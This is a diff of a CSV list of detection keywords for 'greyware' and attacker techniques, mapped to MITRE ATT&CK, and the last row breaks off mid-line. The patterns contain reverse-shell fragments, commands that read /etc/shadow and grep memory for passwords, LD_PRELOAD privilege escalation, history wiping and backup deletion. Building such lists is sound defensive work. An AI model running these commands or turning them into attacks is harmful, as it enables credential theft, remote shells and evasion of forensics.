-"*solo_mine_example.cmd*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*solo_mine_example.cmd*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "*SplashtopStreamer3500.exe* prevercheck *","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
-"*src/xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*src\xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*src/xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*src\xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "*ssh @ssh.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
 "*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *","greyware_tool_keyword","wmic","WMIC suspicious transfer ","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z"
+"*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
 "*strings -n * /dev/mem | grep -i pass*","greyware_tool_keyword","grep","search for passwords in memory and core dumps","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "*sudo apache2 -f /etc/shadow*","greyware_tool_keyword","sudo","access sensitive files by abusing sudo permissions","T1548.001 - T1059.004","TA0004 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*sudo LD_LIBRARY_PATH=. apache2*","greyware_tool_keyword","sudo","abusing LD_LIBRARY_PATH sudo option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*sudo LD_PRELOAD=/tmp/preload.so find*","greyware_tool_keyword","sudo","abusinf LD_PREDLOAD option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
-"*sudo rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
+"*sudo rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
 "*syscall * out of bounds*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
 "*syscall not permitted:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
 "*syscall validate failed:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
@@ -1068,35 +1108,35 @@ "*tasklist /svc | findstr /i ""vmtoolsd.exe""*","greyware_tool_keyword","tasklist","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*tcp://0.tcp.ngrok.io:*","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*tcpdump *","greyware_tool_keyword","tcpdump","A powerful command-line packet analyzer.and libpcap. a portable C/C++ library for network traffic capture","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","http://www.tcpdump.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*telnet * | /bin/bash | telnet *","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*telnet * | /bin/bash | telnet *","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" 
"*tools/adfind*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*touch -a*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*touch -m*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*touch -r *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to 
mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*touch -t *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*touch -a*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -m*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -r *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same 
folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -t *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*Transfer done (but failed to open directory).*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" -"*truncate -s0 *bash_history'*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*truncate -s0 *bash_history'*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. 
","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" "*tshark *-i *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -f *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -Q*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -r *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*ttyd -i 0.0.0.0 -p 7681 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*ttyd -i 0.0.0.0 -p 7682 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*ttyd -i 0.0.0.0 -p 7681 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*ttyd -i 0.0.0.0 -p 7682 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*tunnels-prod-rel-tm.trafficmanager.net*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*","greyware_tool_keyword","lyncsmash","default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","greyware_tools high risks of false positives","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*uname -a* w* id* /bin/bash -i*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" -"*unexpected bytes remain after decoding*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*unexpected internal error*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation 
Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*unknown or unsupported key type*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*unset HISTFILE*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*uname -a* w* id* /bin/bash -i*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*unexpected bytes remain after 
decoding*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unexpected internal error*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unknown or unsupported key type*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*unset HISTFILE*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*unset HISTFILE*","greyware_tool_keyword","unset","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*unshadow passwd shadow > *","greyware_tool_keyword","unshadow","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*updog --*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*updog -d /*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*updog -p *","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*updog-master.zip*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog --*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -d /*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -p *","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog-master.zip*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" "*uTorrent (1).exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*uTorrent.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*utorrent_installer.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1116,9 +1156,9 @@ "*wbadmin DELETE SYSTEMSTATEBACKUP*","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*weird status:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - 